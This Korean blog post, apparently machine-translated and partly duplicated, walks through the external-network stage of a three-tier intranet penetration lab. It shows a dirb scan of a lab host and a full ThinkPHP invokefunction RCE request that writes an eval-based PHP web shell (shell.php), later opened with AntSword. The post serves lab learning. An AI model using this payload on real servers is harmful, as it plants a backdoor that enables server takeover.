기술나눔

CFS 3계층 인트라넷 침투 - 외부망 관리(1)

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

목차

외부 네트워크 관리

공격할 수 있는 방법이 있는지 먼저 폭발시켜 보자.

의심스러운 경로를 시도해 보았는데, thinkphp 프레임워크라는 것을 알게 되었습니다. 저도 버전을 알고 있었기 때문에 다음 날 화이팅 하도록 하겠습니다.

PHP에 쓰기

​php를 성공적으로 편집하고 작성하면 다음 날 바로 받을 수 있습니다.

개미검 rce try 링크

성공적으로 관리됨

외부 네트워크 관리

공격할 수 있는 방법이 있는지 먼저 폭발시켜 보자.

dirsearch, dirb, gobuster 및 기타 도구를 사용해 볼 수 있습니다.

dirb http://192.168.20.130/

의심스러운 경로를 시도해 보았는데, thinkphp 프레임워크라는 것을 알게 되었습니다. 저도 버전을 알고 있었기 때문에 다음 날 화이팅 하도록 하겠습니다.

PHP에 쓰기

http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

PHP에 성공적으로 작성되었으므로 쉽게 얻을 수 있습니다.

http://192.168.20.130/public/shell.php

개미검 rce try 링크

성공적으로 관리됨

개인 프로필

그는 30년 이상 기술 연구에 전념해 왔으며, java, linux, javascript, php, css 등 다양한 언어에 능숙하며, 오픈 소스 분야에서 많은 공헌을 했습니다. 나중에 참조할 수 있도록 기술 개발의 일부 문제를 공유하는 개발자 문서 스테이션입니다.

내 연락처 정보

우편